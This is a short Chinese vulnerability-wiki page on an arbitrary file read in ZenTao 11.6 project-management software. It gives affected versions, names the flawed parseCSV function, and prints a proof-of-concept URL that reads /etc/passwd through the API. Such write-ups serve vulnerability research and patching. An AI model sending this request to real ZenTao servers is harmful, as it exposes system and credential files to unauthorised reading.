menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 禅道 chevron_right 禅道 11.6 任意文件读取.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    禅道 11.6 任意文件读取.md
    1.08 KB / 2021-04-21 09:23:46
        禅道 11.6 任意文件读取
======================

一、漏洞简介
------------

禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。
厂商官网:<https://www.zentao.net/>
而此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所有的项目都受此漏洞影响

二、漏洞影响
------------

禅道 11.6

禅道开源版 9版本

三、复现过程
------------

漏洞代码位于module/file/model.php中的parseCSV函数

![](./resource/禅道11.6任意文件读取/media/rId25.png)

这里通过上面的思路同样可以对fileName进行赋值,最终返回读取的文件数据
漏洞poc为:

    http://www.0-sec.org/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd

image
    links
    file_download